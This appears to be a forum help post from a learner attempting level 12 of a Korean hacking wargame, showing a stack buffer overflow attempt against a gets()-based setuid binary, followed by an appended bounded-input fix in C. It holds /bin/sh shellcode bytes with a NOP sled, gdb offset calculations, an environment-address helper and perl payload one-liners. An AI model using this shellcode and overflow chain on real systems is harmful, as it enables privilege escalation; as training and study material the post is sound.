Level Hacking

sohun5013
level12: please check my work.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3250

I can't tell where I went wrong ㅠㅠ. It's been days now....

[level12@ftz tmp]$ echo -n $SHELLCODE | hexdump -C ;# I put the shellcode, including a NOP sled, into an environment variable named SHELLCODE.
00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000000c0  90 90 90 90 90 90 90 90  eb 1f 5e 89 76 08 31 c0  |..........^.v.1.|
000000d0  88 46 07 89 46 0c b0 0b  89 f3 8d 4e 08 8d 56 0c  |.F..F......N..V.|
000000e0  cd 80 31 db 89 d8 40 cd  80 e8 dc ff ff ff 2f 62  |..1...@......./b|
000000f0  69 6e 2f 73 68                                    |in/sh|
000000f5
[level12@ftz tmp]$ gdb /home/level12/attackme ;# Running gdb with the absolute path. The absolute path may not really matter here...
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) disass main
Dump of assembler code for function main:
0x08048470 <main+0>:    push   %ebp
0x08048471 <main+1>:    mov    %esp,%ebp
0x08048473 <main+3>:    sub    $0x108,%esp
0x08048479 <main+9>:    sub    $0x8,%esp
0x0804847c <main+12>:   push   $0xc15
0x08048481 <main+17>:   push   $0xc15
0x08048486 <main+22>:   call   0x804835c <setreuid>
0x0804848b <main+27>:   add    $0x10,%esp
0x0804848e <main+30>:   sub    $0xc,%esp
0x08048491 <main+33>:   push   $0x8048538
0x08048496 <main+38>:   call   0x804834c <printf>
0x0804849b <main+43>:   add    $0x10,%esp
0x0804849e <main+46>:   sub    $0xc,%esp
0x080484a1 <main+49>:   lea    0xfffffef8(%ebp),%eax
0x080484a7 <main+55>:   push   %eax
0x080484a8 <main+56>:   call   0x804831c <gets>
0x080484ad <main+61>:   add    $0x10,%esp
0x080484b0 <main+64>:   sub    $0x8,%esp
0x080484b3 <main+67>:   lea    0xfffffef8(%ebp),%eax
0x080484b9 <main+73>:   push   %eax
0x080484ba <main+74>:   push   $0x804854c
0x080484bf <main+79>:   call   0x804834c <printf>
0x080484c4 <main+84>:   add    $0x10,%esp
0x080484c7 <main+87>:   leave
0x080484c8 <main+88>:   ret
0x080484c9 <main+89>:   lea    0x0(%esi),%esi
0x080484cc <main+92>:   nop
0x080484cd <main+93>:   nop
0x080484ce <main+94>:   nop
0x080484cf <main+95>:   nop
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x8048479
(gdb) b *main+61
Breakpoint 2 at 0x80484ad
(gdb) run
Starting program: /home/level12/attackme

Breakpoint 1, 0x08048479 in main ()
(gdb) i r eip
eip            0x8048479        0x8048479
(gdb) x/20x $esp+0x108
0xbffffa28:     0xbffffa48      0x40033917      0x00000001      0xbffffa74
0xbffffa38:     0xbffffa7c      0x4001582c      0x00000001      0x08048370
0xbffffa48:     0x00000000      0x08048391      0x08048470      0x00000001
0xbffffa58:     0xbffffa74      0x080482e4      0x08048510      0x4000c660
0xbffffa68:     0xbffffa6c      0x00000000      0x00000001      0xbffffb5d
(gdb) p 0xbffffa32                ;# This one was a miscalculation;;
$1 = 3221223986
(gdb) p 0xbffffa28 + 4
$2 = 3221223980                        ;# This is main's ret value.
(gdb) c
Continuing.
문장을 입력하세요.
abcdefghijklmn

Breakpoint 2, 0x080484ad in main ()
(gdb) x/40x $esp
0xbffff910:     0xbffff920      0x00000c15      0xbffff940      0x00000001
0xbffff920:     0x64636261      0x68676665      0x6c6b6a69      0x07006e6d
0xbffff930:     0xbffff9d0      0x40015a38      0x0029656e      0x00000000
0xbffff940:     0x400299c8      0x400160a8      0x00000000      0x00000000
0xbffff950:     0x00000000      0x00000000      0x00000000      0x4000807f
0xbffff960:     0x4001582c      0x00002005      0xbffff990      0xbffff9bc
0xbffff970:     0x4000be03      0x40016244      0x00000000      0x0177ff8e
0xbffff980:     0x4000807f      0x4001582c      0x00000059      0x40015a38
0xbffff990:     0xbffff9e0      0x4000be03      0x40015bd4      0x40016370
0xbffff9a0:     0x00000001      0x00000000      0x4002bdbd      0x40024a88
(gdb) p 0xbffff920
$3 = 3221223712                        ;# This is the start address of the str array
(gdb) p $2 - $3                        ;# Taking the difference of the two
$4 = 268                                ;# gives 268 bytes.
(gdb) p $4 / 4
$5 = 67                                        ;# I'm going to write the address value 4 bytes at a time, so I divided by 4. I'll add +1 to this.
(gdb) q
The program is running.  Exit anyway? (y or n) y
[level12@ftz tmp]$ ./g SHELLCODE /home/level12/attackme ;# For reference, writing the executable with its absolute path gave the same value..
SHELLCODE의 대충 어림잡은 메모리주소는 0xbffffb87예염..
[level12@ftz tmp]$ cat ./g.c ;# I'll show the source code too..
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
        char* ptr;

        if (argc < 3) { perror("getenvaddr [환경변수 이름] [대상 프로그램]"); exit(1); }

        ptr = (char*)getenv(argv[1]);
        if ( !ptr ) { perror("환경변수 이름이 틀렸나봐요. ㅠㅠ"); exit(2); }

        ptr += (strlen(argv[0]) - strlen(argv[2]))*2;
        printf("%s의 대충 어림잡은 메모리주소는 %p예염..\n", argv[1], ptr);

        return 0;
}
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xbf"x68'|/home/level12/attackme ;# Since there's a NOP sled as well, I tried a generous +64 on the environment variable address I got.
문장을 입력하세요.
Çûÿ¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?ÿ¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç??
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xaf"x68'|/home/level12/attackme
문장을 입력하세요.
Çûÿ????????????????????????????????????????????????????????????????????????????????????????????????????????ÿ???????????????????????????????
세그멘테이션 오류
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xaf"x67'|/home/level12/attackme ;# Is the segmentation fault here because of the SFP?
문장을 입력하세요.
Çûÿ????????????????????????????????????????????????????????????????????????????????????????????????????????ÿ?????????????????????????????
세그멘테이션 오류
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xaf"x66'|/home/level12/attackme
문장을 입력하세요.
Çûÿ????????????????????????????????????????????????????????????????????????????????????????????????????????ÿ???????????????????????????
[level12@ftz tmp]$ perl -e 'print "\xe7\xfb\xff\xbf"x68'|/home/level12/attackme ;# Just flailing at this point ㅠㅠ
문장을 입력하세요.
çûÿ¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?ÿ¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç??
[level12@ftz tmp]$

Where did I go wrong.. I'd appreciate a kind answer! Using the absolute path doesn't solve it either!

  Hit : 3291     Date : 2012/01/14 09:23
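
The disassembly in the post shows attackme calling gets on a stack buffer at -0x108(%ebp), which is why input can run on to the saved return address 268 bytes past the buffer start. As an added example (not from the original post or from the attackme source), a bounded line reader that removes that overflow; the 256-byte buffer size and every name in it are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define STR_SIZE 256 /* assumed size; the post shows only the 0x108-byte frame */

enum { LINE_OK = 0, LINE_EOF = -1, LINE_TOO_LONG = -2 };

/* Hypothetical replacement for the gets() call at main+56: reads one line
 * into buf without ever writing more than cap bytes. An overlong line is
 * rejected and drained so its tail is not treated as the next input. */
int read_line_bounded(FILE *in, char *buf, size_t cap)
{
    if (cap < 2 || cap > 0x7fffffff)
        return LINE_TOO_LONG;
    if (fgets(buf, (int)cap, in) == NULL) {
        buf[0] = '\0';
        return LINE_EOF;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';          /* complete line, strip the newline */
        return LINE_OK;
    }
    int c = fgetc(in);
    if (c == EOF || c == '\n')        /* line filled buf exactly, or input ended */
        return LINE_OK;
    while (c != '\n' && c != EOF)     /* discard the rest of the long line */
        c = fgetc(in);
    buf[0] = '\0';
    return LINE_TOO_LONG;
}

int main(void)
{
    char str[STR_SIZE];

    printf("Enter a sentence.\n");
    if (read_line_bounded(stdin, str, sizeof str) != LINE_OK) {
        fprintf(stderr, "input rejected\n");
        return 1;
    }
    printf("%s\n", str);
    return 0;
}
```

With this reader a 272-byte input like the ones piped in above is refused before it can reach the saved frame pointer or return address.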



    